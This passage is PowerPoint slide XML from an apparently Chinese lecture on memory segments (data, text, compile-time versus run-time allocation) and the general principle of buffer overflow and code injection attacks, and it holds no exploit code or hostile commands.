                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Wingdings" pitchFamily="2" charset="2"/>
                      <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                    </a:rPr>
                    <a:t>:</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                      <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>   </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316451" name="Rectangle 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="0" y="1440"/>
                  <a:ext cx="294"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4" name="Group 36"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="1440"/>
                <a:ext cx="465" cy="480"/>
                <a:chOff x="294" y="1440"/>
                <a:chExt cx="465" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316453" name="Rectangle 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="337" y="1440"/>
                  <a:ext cx="379" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>DATA</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316454" name="Rectangle 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="294" y="1440"/>
                  <a:ext cx="465"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5" name="Group 39"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="759" y="1440"/>
                <a:ext cx="2690" cy="480"/>
                <a:chOff x="759" y="1440"/>
                <a:chExt cx="2690" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316456" name="Rectangle 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="802" y="1440"/>
                  <a:ext cx="2604" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>初始化全局静态数据，即：</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>int shit=9,char head[]=”ugh”;</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316457" name="Rectangle 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="759" y="1440"/>
                  <a:ext cx="2690"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6" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="1920"/>
                <a:ext cx="294" cy="480"/>
                <a:chOff x="0" y="1920"/>
                <a:chExt cx="294" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316459" name="Rectangle 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="43" y="1920"/>
                  <a:ext cx="208" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Wingdings" pitchFamily="2" charset="2"/>
                      <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                    </a:rPr>
                    <a:t>:</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                      <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>   </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316460" name="Rectangle 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="0" y="1920"/>
                  <a:ext cx="294"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7" name="Group 45"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="1920"/>
                <a:ext cx="465" cy="480"/>
                <a:chOff x="294" y="1920"/>
                <a:chExt cx="465" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316462" name="Rectangle 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="337" y="1920"/>
                  <a:ext cx="379" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>TEXT</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316463" name="Rectangle 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="294" y="1920"/>
                  <a:ext cx="465"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nvGrpSpPr>
              <p:cNvPr id="18" name="Group 48"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="759" y="1920"/>
                <a:ext cx="2690" cy="480"/>
                <a:chOff x="759" y="1920"/>
                <a:chExt cx="2690" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316465" name="Rectangle 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="802" y="1920"/>
                  <a:ext cx="2604" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>机器指令 </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>= </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>操作码 </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>+ </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>操作数；</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>read-only</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316466" name="Rectangle 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="759" y="1920"/>
                  <a:ext cx="2690" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="316467" name="Rectangle 51"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-3" y="-3"/>
              <a:ext cx="3455" cy="2406"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316468" name="Line 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7786688" y="3355975"/>
            <a:ext cx="25400" cy="2665413"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316469" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7826375" y="3970338"/>
            <a:ext cx="1138238" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>编译时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316470" name="Line 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7786688" y="1484313"/>
            <a:ext cx="1587" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316471" name="Text Box 55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7885113" y="1773238"/>
            <a:ext cx="1208087" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>执行时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分配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sz="3600" dirty="0"/>
              <a:t>缓冲区溢出攻击原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624601" y="1437629"/>
            <a:ext cx="7623661" cy="4683254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>缓冲区溢出的目的在于扰乱具有某些特权的运行程序的执行流程，让攻击者取得程序的控制权，两个步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）在程序的地址空间（堆栈、堆、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段等）里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>植 入攻击代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>植入攻击代码所需的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>（如果攻击代码已存在于目标程序中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（２）改变程序的执行流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行攻击代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424954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sz="3600" dirty="0"/>
              <a:t>缓冲区溢出攻击原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736568" y="1474075"/>
            <a:ext cx="7660983" cy="4665466"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
